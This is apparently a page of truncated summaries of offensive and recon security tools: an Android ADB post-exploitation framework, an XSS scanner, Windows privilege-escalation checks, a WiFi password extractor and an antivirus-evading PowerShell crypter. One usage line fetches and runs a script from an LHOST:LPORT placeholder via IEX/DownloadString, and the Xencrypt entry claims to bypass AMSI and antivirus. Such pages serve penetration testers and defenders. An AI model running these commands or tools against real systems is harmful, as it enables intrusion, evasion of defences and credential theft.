image
Ghost Framework is an [Android](<https://www.kitploit.com/search/label/Android> "Android" ) post [exploitation framework](<https://www.kitploit.com/search/label/Exploitation%20Framework> "exploitation framework" ) that uses an Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration. Getting started Ghost installation cd ghost chmod +x install.sh ./install.sh Ghost uninstallation cd ghost chmod +x uninstall.sh ./uninstall.sh Ghost Framework execution To execute Ghost Framework you should execute the following command. ghost Why Ghost Framework Accessing device shell. Ghost Framework can be used to access the remote Android device shell without using OpenSSH or other protocols. Emulating device button presses. Ghost Framework can be used to emulate button presses on the remote Android device. Removing device password. Ghost Framework can be used to remove the remote Android device password if it was forgotten. Ghost Framework disclaimer Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Download…

Source

image
This is the extended version based on the initial idea already published as "xssfinder". This private version allows an attacker to perform not only GET but also POST requests. Additionally its possible to proxy every request through Burp or another tunnel. First steps Rename the example.app-settings.conf to app-settings.conf and adjust the settings. It should work out of the box but depending on the target I would recommend to resize the chunk sizes. Execution This tool does not expect any arguments via CLI, so just type: python3 extended-xss-search.py Configuration Its possible to set a lot of options and settings, so here are some explanations. Files The main config file is the "app-settings.conf", everything has to be done in that file! Besides that, there are some other files which allow to set more complex data like headers, urls and cookies. config/cookie-jar.txt Use this file to add a cookie string. I usually copy the one which you can see in every burp request. Please just copy the value of the "Cookie:"-header. A sample input is in the default file. config/http-headers.txt This file defines the http headers which are added to the request and manipulated (payload is added to each one). The most important ones are already in the file. But feel free to add more. config/parameters.txt The tool has the option to brute force get and post parameters. In that case those parameters (+ those in the query string) will be used….

Source

image
Phonia Toolkit is one of the most advanced toolkits to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with a very good accuracy. Getting started Phonia installation cd phonia chmod +x install.sh ./install.sh Phonia uninstallation cd phonia chmod +x uninstall.sh ./uninstall.sh Phonia Toolkit execution phonia -h usage: phonia [-h] [-p <phone>] [-i <inputfile>] [-o <outputfile>] [-s <scanner>] [–recon] [–no-ansi] [-u] optional arguments: -h, –help show this help message and exit -p <phone>, –phone <phone> The [phone number](<https://www.kitploit.com/search/label/Phone%20Number> "phone number" ) to scan. -i <inputfile>, –input <inputfile> List of phone numbers to scan. -o <outputfile>, –output <outputfile> Output to save scan results. -s <scanner>, –scanner <scanner> The [scanner](<https://www.kitploit.com/search/label/Scanner> "scanner" ) to use. –recon Launch custom format reconnaissance. –no-ansi Disable colored output. – u, –update Update Phonia Toolkit. Phonia Toolkit examples Example of the phonia basic scan phonia -p 15554443333 Example of the scanning from a file phonia -i input.txt -o output.txt Example of…

Source

image
This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation . I built on the amazing work done by @harmj0y and @mattifestation in PowerUp . I added more checks and also tried to reduce the amount of false positives. It's still a Work-in-Progress because there are a few more checks I want to implement but it's already quite complete. If you have any suggestion (improvements, features), feel free to contact me on Twitter @itm4n . Usage Use the script from a PowerShell prompt. PS C:Temp> Set-ExecutionPolicy Bypass -Scope Process -Force PS C:Temp> . .Invoke-PrivescCheck.ps1; Invoke-PrivescCheck Display output and write to a log file at the same time. PS C:Temp> . .Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object "C:Tempresult.txt" Use the script from a CMD prompt. C:Temp>powershell -ep bypass -c ". .Invoke-PrivescCheck.ps1; Invoke-PrivescCheck" Import the script from a web server. C:Temp>powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://LHOST:LPORT/Invoke-PrivescCheck.ps1'); Invoke-PrivescCheck" Yet another Windows Privilege escalation tool, why? I really like PowerUp because it can enumerate common vulnerabilities very quickly and without using any third-party tools. The problem is that it hasn't been updated for several years now. The…

Source

image
Monitor twitter stream. TwitWork use the twitter stream which allows you to have a tweets in real-time. There is an input that allows you to filter the flow on one (or more) keywords or on an @ based on twitter tracking Demo This is a demo of export data on keyword "Coronavirius" https://twitwork.github.io/ Require NodeJs Npm Twitter api key Installation git clone https://github.com/atmoner/TwitWork.git cd TwitWork npm install Run it npm start Development setup For the improvement of the software, do not hesitate to make your proposal in the support section To Do Main menu Add/save file Edit API key Setting Core Hashtag extract Add node/edge for hashtag Meta atmon3r – @atmon3r – [email protected] Download…

Source

image
All in one tools for Information Gathering . Instagram: Capture the Root Screenshots Read Me Initially, you need to create a project where you will save everything. All of the collected information is saved as "project-name" in results directory. You can update user agent and proxy information in the settings section and also update url, proxy, project name, wordlist, thread numbers. Features This tool include: Dork Finder Admin Panel Finder Cms Finder Ip History Reverse Ip Page Viewer Proxy Finder Installation Installation with requirements.txt git clone https://github.com/capture0x/XCTR-Hacking-Tools/ cd xctr-hacking-tools pip3 install -r requirements.txt Usage python3 xctr.py All results save in results/project-name. Dork Finder The dork finder have 2 section. Bing and yandex. e.g: *.php?id= Admin Panel Finder In this section, firstly need choose a wordlist for scanning. Press 2 to change wordlist and login. Url should be https://targetsite.com/ (http or s and / symbol at the end of the url.) If scanning is slow you will update the proxies.(Press 3 to update) Cms Finder You'll find cms version from meta name. Ip History This tool displays and save the ip history of the domain. e.g usage: targetsite.com Reverse Ip With this tool, you can find domains on server. e.g usage: 212.57.147.54 Page Viewer You can increase the number of page…

Source

image
WiFi Passview is an open source batch script based program that can recover your WiFi Password easily in seconds. This is for Windows OS only. Basically, this scripted program has the same function as other passview softwares such as webpassview and mailpassview. _ Disclaimer : WiFi Passview is NOT designed for malicious use! Please use this program responsibly! _ ZSecurity.org This project is posted on a cyber security educational website called zsecurity.org you should visit this project here for more information: https://zsecurity.org How it Works Basically, this is the shortcut and batch scripted file version of a popular WiFi password manager viewing method using command prompt. This is how it works… netsh [wlan](<https://www.kitploit.com/search/label/WLAN> "wlan" ) show profiles When you use this tool, you are able to extract the WiFi passwords stored on the target machine in just a seconds. Features This simple tool offers you the following features… Extract all available WiFi passwords stored in the target machine and can be done in just a seconds. Extract password from specific target SSID. Save extracted passwords. Additional options. No manual reading of Key Content , the tool will do that for you! Standalone batch program. Customizable. Usage Download the repository and look for "wifi-passview-vX.X.X.bat" file and open it and run as administrator. All you have to do is to follow the on-screen…

Source

image
DNS Rebinding freamwork containing: a dns server obviously web api to create new subdomains and control the dns server, view logs, stuff like that shitty react app to make it even more comfy What does it do? It lets you create dns bins like a burp collaborator but it adds a bit more features… (at least it tries to) You can specify what ips should it resolve to and how many times, for now it _ only supports A records _ 🙁 Then you can see where it was requested from, what did it resolve to,… in logs How to run it First of all, check the configuration in .py files, it's usually marked by """ *** CONFIG *** """ You also should not forget to change docker and redis passwords in docker-compose.yml app.py dns_resources Set up postgres and redis sudo docker-compose up in ./BE pip3 install -r requirements.txt python3 dns.py # to start the dns server for testing purposes development server is enough I think FLASK_APP=app.py FLASK_ENV=development flask run then in ./FE npm install npm start Api documentation For api to work you will need to be signed in – API is using bearer tokens for authentication and Content-Type has to be set to application/json Registration /auth/signup POST /auth/signup _ JSON body: _ { "username": "marek", "password": "ffffffff" } _ Response: _ { "name": "marek", "access_token":…

Source

image
BadBlood by Secframe fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active Directory. Each time this tool runs, it produces different results. The domain, users, groups, computers and permissions are different. Every. Single. Time. Full User Guide and Info Commands NONE : At this time all items of the script are configured in the .ps1 files. Files are outlined on the User Guide on Secframe.com Acknowledgments I'd like to send thanks to the countless people who wanted this as a product and waited while I made it! Screenshots Installation Requirements: Domain Admin and Schema Admin permissions Active Directory Powershell Installed Running On Windows: clone the repo git clone https://github.com/davidprowe/badblood.git Run Invoke-badblood.ps1 ./badblood/invoke-badblood.ps1 Talk About the BadBlood Message or Follow me on twitter @ davidprowe Drop a note on secframe.com I am not responsible for cleanup if this is run in a production domain Disclaimer Please note: all tools/ scripts in this repo are released for use "AS IS" without any warranties of any kind, including, but not limited to their installation, use, or performance. We disclaim any and all…

Source

image
Tired of wasting lots of time obfuscating PowerShell scripts like invoke-mimikatz only to have them get detected anyway? Wouldn't it be awesome if you could take any script and automatically and with almost no effort generate a near-infinite amount of variants in order to defeat signature-based antivirus detection mechanisms? WELL, NOW YOU CAN! For the low low price of free! Xencrypt is a PowerShell crypter that uses AES encryption and Gzip/DEFLATE compression to with every invocation generate a completely unique yet functionally equivalent output script given any input script. It does this by compressing and encrypting the input script and storing this data as a payload in a new script which will unencrypt and decompress the payload before running it. In essence, it is to PowerShell what a PE crypter is. In action Features Xencrypt: Bypasses AMSI and all modern AVs in use on VirusTotal (as of writing) Compresses and encrypts powershell scripts Has a minimal and often even negative (thanks to the compression) overhead Randomizes variable names to further obfuscate the decrypter stub Randomizes encryption, compression and even the order that the statements appear in the code for maximum entropy! Super easy to modify to create your own crypter variant Supports recursive layering (crypter crypting the crypted output), tested up to 500 layers. Supports Import-Module as well as standard running as long as the input script also supported it …

Source